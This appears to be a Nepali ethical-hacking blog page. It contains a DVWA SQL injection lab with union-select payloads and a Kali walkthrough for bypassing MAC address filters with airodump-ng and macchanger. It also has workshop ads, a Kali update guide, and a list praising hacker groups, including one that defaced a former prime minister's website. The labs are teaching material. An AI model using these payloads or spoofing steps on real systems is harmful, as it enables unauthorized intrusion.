CHFI & Digital Forensics Tutorial [Part 1] – Basics & FTK IMAGER Lab


Hello and welcome to this new series of Student Video Tutorial. This series is basically related Digital Forensics. I will cover wide range of Digital Forensics together with Computer Hacking Forensic Investigation, CHFI.

In this video, we will see FTK IMAGER and use it for Acquiring Disk Image.

Top Hackers of Nepal, Best Hacker Group of Nepal,Top 5 Hackers of Nepal, Best Hackers in Nepal


Here you will get the lists of well known hackers of Nepal

Best 1 : BIJAY ACHARYA 

Ethical Hacking Trainer, Key Speaker in Seminar (10+ till 2016) of Cyber Security & Ethical Hacking, First hacker who made CEH (Ethical Hacking) Tutorial Videos in NEPALI Language. (find video here >> Click here for youtube channel

First hacker who founded social network site for nepali hackers. find it here > hcnepal.com

Admin of NHC (Nepalese Hackers Community) FB Group. Find it here : https://www.facebook.com/groups/nepalesehackerscommunity/

Active and famous Hacking Article writer in Cybrary.it  . . Find his profile in cybrary here >> https://www.cybrary.it/members/bjacharya/

By all means, he’s Ethical Hacker, who have CEHv9 Trained Certificate from EC Council.

ADD him in Facebook here (Public Profile) : https://www.facebook.com/nhcbijay.ach

Want more about him ? Go here >> http://www.bijayacharya.com/about-me/

Best 2 :

Team Swastika

Team Swastika went bit popular when the news hit that they had hacked 10K Facebook accounts but later on after cross check by the experts, they found that the hack was just a mock and most of the accounts were either dead or previously publicized by other hackers. However this group is still active through their Facebook and website where you can find some of their works.

Best 3 :

Ardha Pagal( Half Mad)

A young Nepali Hacktivist popularly known as Ardha Pagal meaning half  mad mainly due to his peculiar behavior. This man was featured in an article by Softpedia as young Nepali Hacktivist. You can find his entire interview in Softpedia so check it out. Currently he is not much active but you can also follow him on twitter. He got into hacking due to his extreme desire to hack his crush’s Facebook account and later with his own effort he got into deep hacking. His identity is still anonymous.

Best 4 :

Opnep

Very popular and active hacking group of Nepal. The noticeable work done by them is the success in hacking the website of former prime minister of Nepal Dr. Babu Ram Bhattrai. They have their own Facebook page where they share their works and interact with the public. This anonymous group also have their own YouTube channel where they leave message for the Nepali government and people. The main motto of this group is to eradicate all sorts of corruption surviving in Nepali Government and also to establish a secure and well developed web environment in Nepal.

Top Hackers of Nepal, Best Hacker Group of Nepal,Top 5 Hackers of Nepal, Best Hackers in Nepal, bijay acharya hacker nepal, bijay acharya ceh, best hacking group nepal, pokhara hackers, top 5 hackers of nepal

SQL injection lab PT.1 – Intro/Lab setup – HC NEPAL


Hello Gurkhas ! ! !

By : Bijay Acharya  | Add him in Facebook here > https://www.facebook.com/nhcbijay.ach  |  Follow him in twitter : @acharya_bijay   | Subscribe his tutorial channel for ethical hacking videos (in nepali language) here > > Student Video Tutorial 

In this lab, We’ll begin the series of SQL Injection. This will be Part-Wise Article/Guide on SQL Injection.

  • Let’s start from LAB setup :
    > Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.
    > Check IP address of both devices.
  • Step-by-step instruction
    1. Open Kali Linux (or BT 5r3)
    2. Open your browser and type http://IP address of
    Metasploitable/dvwa/login.php
    3. Login with user name “admin” and password “password”
    4. Click on DVWA Security and set it to low then submit
    5. Click on manual SQL injection
    6. On User ID box type 1 and Submit
    (Php select statement: $getid = “SELECT first_name, last_name FROM
    users WHERE user_id = ‘$id’”;)
    7. %’ or ‘0’=’0
    (mysql> SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
    ‘0’=’0′;)
    8. Get DB version: %’ or 0=0 union select null, version() #
    9. Get DB user: %’ or 0=0 union select null, user() #
    10. Get DB name: %’ or 0=0 union select null, database() #
    11. Get Schima information: %’ and 1=0 union select null, table_name from
    information_schema.tables #
  • MORE here > http://lab.hcnepal.com/2016/08/24/sql-injection-lab-pt-1-introlab-setup-hc-nepal/

How To Use Http Injector | Http Injector Basic Guide | Http injector for ncell


Article Post by : BIJAY ACHARYA  | Add him on Facebook here >  https://www.facebook.com/nhcbijay.ach   |  Follow Him in twitter here : acharya_bijay

…Check out our social network site for (Nepali) Hackers here > hcnepal.com

Also Read > HOW TO CREATE CONFIG FILE FOR HTTP INJECTOR [Step by Step] – Part 2

Http Injector is an Android VPN tool to used to set custom HTTP header. It’s used to connect your SSH/Proxy with custom header and also it can access blocked websites behind firewall with SSH tunneling support & proxy server. It tunnels all applications and help to inject queries into your network server.
Http Injector is of great use because it hardly disconnect and save battery.

Also Read > Report Cyber Crime in Nepal (Only for Nepalese) – For Reporting, click here

How To Use Http Injector
Using Http Injector requires professional skills but it has been made easier for everyone by importing Http Config Files already made.
1. Download the required Config Http Injector file for the settings you want to use
2. Import a Config File by clicking on Import on the top right corner of the Http Injector when launched as shown below after AD 1 and AD 2

AD 1 : Ethical Hacking Video Tutorials in NEPALI LANGUAGE. Click Here > > Learn Ethical Hacking [In Nepali – Youtube] 

AD 2 : Earn Money From Youtube.

[In Nepali] Youtube Monetization PT.2 – Top 5 Mistakes of Beginners

Continue reading How To Use Http Injector | Http Injector Basic Guide | Http injector for ncell

5 Days Workshop on Computer Hacking/Ethical Hacking, 2016 – Pokhara Nepal – EHW 6


“Ethical Hacking Training For Beginners” – In POKHARA
••• 5 Days Workshop on “Computer Hacking/Ethical Hacking”
••• Workshop Date : Aug 7 – Aug 11 ,2016
••• Join before August 3, 2016 (Limited Seats)
••• Instructor/Trainer : Bijay Acharya (ECC CEHv9 Trained Personnel)

> EHW 6 ( Ethical Hacking Workshop 6)

EHW 6 - aug 7

Training/Workshop Contents are :
1) Virus Creation, Computer Hacking
2) Practical labs on how email id, operating systems, wi-fi are hacked & how to secure our systems.
3) Footprinting / Scanning / Anonymity Continue reading 5 Days Workshop on Computer Hacking/Ethical Hacking, 2016 – Pokhara Nepal – EHW 6

Common passwords banned : Microsoft


image

Ethical Hacking with Kali Linux [3] – Bypassing MAC Address Filter


BY : BIJAY ACHARYA http://bijayacharya.com/

Ethical Hacking with Kali Linux [3] – Bypassing MAC Address Filter

> > Welcome all, to this series of Kali Linux for Ethical Hacking. This is 3rd part, & I’ll explain process of bypassing MAC Address Filter on an AP (Access Point).

# 3 basic Process :

– Finding the AP : airmon-ng & airodump-ng

– Finding an associated client : airodump-ng

– Finally, using the Macchanger

# . . . Let’s Begin,

– Before start, make sure that you have eth0, lo, wlan0 are in action. (go to terminal, & run ifconfig)

– Let’s start to monitor on that wireless interface, run :

airmon-ng start wlan0

– After executing above command, we must get new interface mon0 (monitor mode enabled)

– Verify that both interfaces are up & running, run

airmon-ng

– Watch for wlan0 & mon0 , Run :

airodump-ng mon0

– For monitoring all the APs that Kali Linux OS can find out.

– In next step, you will get BSSID and ESSID, channel, cipher. If there is any hidden SSID, then ESSID will be format like this : <length: 0> or with no SSID. [We, saw in 2nd part, on how to uncover this hidden SSID]. But, here you can use any SSID with Open Encryption, or SSID with known password. We will use the MAC address, that was seen in part 2. i.e. 00:A1:B2:11:20:13:5T & channel ‘1’ (Assume, MAC address filter is done in this system & lets suppose it’s SSID is nhc-BJ)

– Now, we try to find out the Client & his MAC Associated with this AP (nhc-BJ). So, that we can use that MAC to bypass filter. Run;

airodump-ng -c 1 -a –bssid 00:A1:B2:11:20:13:5T mon0

(-c is for channel, channel is 1 for BSSID we are trying to connect, -a is for showing only the client associated with this BSSID)

– You will get MAC address with Station associated with that AP, and this is client’s station. (Lets assume Mac = 00:C1:52:11:20:13:7D)

– CTRL+C (press)

– Run ;

macchanger –help
(notice, -m for setting mac)

-Run ;

macchanger -m 00:C1:52:11:20:13:7D wlan0

(if Device or resource busy, then run following command)

airmon-ng stop wlan0

– Run ;

macchanger -m 00:C1:52:11:20:13:7D wlan0

(in success, you will see msg like ‘faked MAC’)

-Run ;

ifconfig wlan0 down

ifconfig wlan0 up

(now, lets see whether we can associate with SSID now or not, with this Faked MAC)

Run ;

iwconfig wlan0 essid nhc-BJ channel 1

(if not run in kali, run it in BackTrack. Or, see update version for kali)

iwconfig wlan0

(if success, Access Point will be associated)

“This series is only for educational purpose, practice this series lab in virtual/separate network, always avoid illegal activities, and if you can, then support us to fight against black hat hackers”

# Join our Facebook NHC group, to get most out of this series

http://www.facebook.com/groups/nepalesehackerscommunity

# Register in our NHC Forum Website

http://www.nhc.bijayacharya.com

# For, free video tutorial & minimum priced certificate, register my OCN (Online Course Nepal) here : http://www.ocn.bijayacharya.com(Remember, Videos are free to watch, you will pay only if you want certificate :), so that we can maintain this open source culture)

ATTACHMENTS
image005ab.png
image005ab.png (26.61 KiB) 

 

 

Ethical Hacking with Kali Linux [2] – Finding Hidden SSIDs


By : Bijay Acharya (http://bijayacharya.com/)

Ethical Hacking with Kali Linux [2] – Finding Hidden SSIDs

> > Welcome all, to this series of Kali Linux for Ethical Hacking. This is Second part, & we’ll be seeing some of the techniques of uncovering hidden SSIDs.

# Process :

– Enabling Wireless Monitoring : airmon-ng

– Discovering the APs (Access Points) : airodump-ng

– Stay calm for Association or use de-authentication : aireplay-ng Continue reading Ethical Hacking with Kali Linux [2] – Finding Hidden SSIDs

Ethical Hacking with Kali Linux [1] – Objective


Ethical Hacking with Kali Linux [1] – Objective

> > Welcome all, to this series of Kali Linux for Ethical Hacking. This is first part, & we’ll be seeing some of the intentions of this series.

# Kali Linux is special OS for Hacking & Penetration Testing Tools (for “White Hat” use).

# Basically for :

– Improving System Security
– using in authorized environment only
– for those who understant Networking Fundamentals.

# What to expect from this series ? :

– Get familiar with more than 100+ tools used for Ethical Hacking
– Building an isolated Test Networks (Physical/Virtual)
– Practice in a “Sandbox” test Network
– Running Terminal Commands via Kali Linux, used for penetration testing.
– Using NHC (Nepalese Hackers Community) throughly.

# Join our Facebook NHC group, to get most out of this series

[url]www.facebook.com/groups/nepalesehackerscommunity
[/url]
# Register in our NHC Forum Website

http://www.nhc.bijayacharya.com

# For, free video tutorial & minimum priced certificate, register my OCN (Online Course Nepal) here : http://www.ocn.bijayacharya.com(Remember, Videos are free to watch, you will pay only if you want certificate :), so that we can maintain this open source culture)

# Initial recommendation, before beginning series,

– You must have a virtual environment ready, with kali linux installed. (Confused ? go over youtube videos on how to do that, or you can find my tutorial on that in my youtube channel http://www.youtube.com/studentvideotutorial (head over ”Ethical Hacking in Nepali” Playlist, Part 4 Video)

. . . Assuming that you have gone through above process . . .

> > Updating Kali Linux Packages :

# Help & Documentation

man <command>
<command>
<command> -h
<command> -help
<command> –help

#Getting Current Advanced Package for Kali Linux (apt-get) :

Go to terminal of kali linux & run :

man apt-get (gives detail about apt-get)

apt-get -h (for help option of apt-get)

# Now, we will use ‘update’ command (…assuming you have connectivity to internet…)

Run,

apt-get update

Done ?

Run,

apt-get upgrade

. . . Depending on your net speed, it will upgrade all packages it retrieved. . .

“This series is only for educational purpose, practice this series lab in virtual/separate network, always avoid illegal activities, and if you can, then support us to fight against black hat hackers”

# Join our Facebook NHC group, to get most out of this series

http://www.facebook.com/groups/nepalesehackerscommunity

# Register in our NHC Forum Website

http://www.nhc.bijayacharya.com

# For, free video tutorial & minimum priced certificate, register my OCN (Online Course Nepal) here : http://www.ocn.bijayacharya.com(Remember, Videos are free to watch, you will pay only if you want certificate :), so that we can maintain this open source culture)

kali_linux_inspired__r__by_xdboy018-d8xd43e.jpg
kali_linux_inspired__r__by_xdboy018-d8xd43e.jpg (32.22 KiB) Viewed 66 times

OCN – Online Course Nepal


http://www.ocn.bijayacharya.com/

– OCN is established in 2016 as a leading e-learning platform for Nepali Citizens. Any one interested in learning via video tutorials & ebook are welcome here. You learn by watching our videos, and get certified with minimum rate of price.  

– OCN is founded by BIJAY ACHARYA

 OCN Services :

1) Online Free Classes ( Via Nepali Videos)

2) Certificate for videos you watched (@minimum price)

3) Ethical Hacking Workshop/Training (Max.5 Days)

4) Website Development (we can design website for you at 10% discount)

Head Office : I.T. Solution Pokhara, Nepal


“Donate us some of your amount, and help us to maintain this culture”

For more detail : +977-9846618997

[Updates on] : Ethical Hacking, Digital Forensics, Cyber Security

Follow

Get every new post delivered to your Inbox.

Join 943 other followers

%d bloggers like this: